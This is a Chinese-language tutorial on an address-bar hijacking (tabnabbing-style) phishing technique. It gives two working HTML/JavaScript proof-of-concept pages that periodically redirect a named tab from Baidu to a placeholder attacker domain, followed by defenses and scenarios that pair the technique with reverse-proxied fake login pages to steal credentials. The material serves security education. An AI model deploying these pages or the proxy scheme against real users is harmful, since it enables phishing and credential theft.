前端黑魔法：远程控制地址栏攻击技术详解

攻击概述

本文介绍了一种利用HTML特性实现远程控制浏览器地址栏的攻击技术，攻击者可以通过这种方式伪造目标网站（如百度、淘宝等）的URL，进行精准钓鱼攻击。

攻击效果演示

1. 用户访问攻击者构造的恶意页面
2. 点击页面中的链接（如"click me"）打开目标网站（如百度）
3. 初始时地址栏显示正常的目标网站URL
4. 经过设定时间（如10秒）后，地址栏被替换为攻击者的钓鱼网站URL
5. 即使用户在该标签页中导航到其他网站，地址栏仍会被攻击者控制

技术原理

基础攻击方法

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="https://www.baidu.com" target="baidu" id="baidu" onclick="return start()">click me</a>
<script>
function start() {
    setInterval(function() {
        baidu.href="http://攻击者域名/baidu";
        baidu.click();
    }, 10000);
}
</script>
</body>
</html>

关键点解析：

1. 使用<a>标签的target属性指定目标窗口名称（如"baidu"）
2. 通过JavaScript定时修改<a>标签的href属性
3. 自动触发click()方法重新打开链接
4. 由于target相同，会在同一标签页中打开新URL，覆盖原页面

使用window.open的变种

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="javascript:;" onclick="return start()">click me</a>
<script>
function start() {
    var w = window.open('https://www.baidu.com', 'baidu');
    setInterval(function() {
        w.location = 'http://攻击者域名/baidu'
    }, 5000)
}
</script>
</body>
</html>

注意事项：

• window.open可能被广告拦截插件阻止
• 效果与<a>标签方法类似，但可靠性较低

技术深入探究

window.name的作用

实验证明：

1. 单纯设置window.name不会导致页面被控制
2. 攻击成功的关键是页面的父子关系而非window.name
3. 只有通过特定方式（如target或window.open）创建的页面才能被控制

攻击持久性分析

1. 只要源页面不关闭，可以永久控制新页面的地址栏
2. 即使用户在新标签页中手动输入其他域名，地址栏仍会被控制
3. 攻击者可以针对不同目标网站生成对应的钓鱼页面

防御措施

1. 用户端防御：

   • 避免点击不可信来源的链接
   • 注意观察地址栏异常变化
   • 使用安全浏览器或插件

2. 开发者防御：

   • 为重要页面添加X-Frame-Options头部
   • 使用rel="noopener"属性（针对target="_blank"的情况）
   • 实施内容安全策略(CSP)

3. 网站管理员防御：

   • 监控和阻止可疑的反向代理请求
   • 实施严格的同源策略

攻击场景扩展

1. 网址导航攻击：

   • 伪装成正规网址导航站
   • 针对用户点击的不同网站生成对应的钓鱼页面

2. 结合反向代理：

   • 使用OpenResty+Lua等技术建立反向代理
   • 实时获取目标网站内容并插入恶意代码
   • 保持页面外观与真实网站一致

3. 精准钓鱼：

   • 根据用户行为推测其常用网站
   • 针对性地伪造登录页面
   • 窃取用户凭证信息

总结

这种地址栏控制攻击具有以下特点：

1. 不需要跨域权限
2. 持久性强，难以察觉
3. 可针对特定目标定制
4. 结合反向代理技术可达到高度伪装

防御关键在于提高安全意识，采用适当的技术防护措施，并对异常页面行为保持警惕。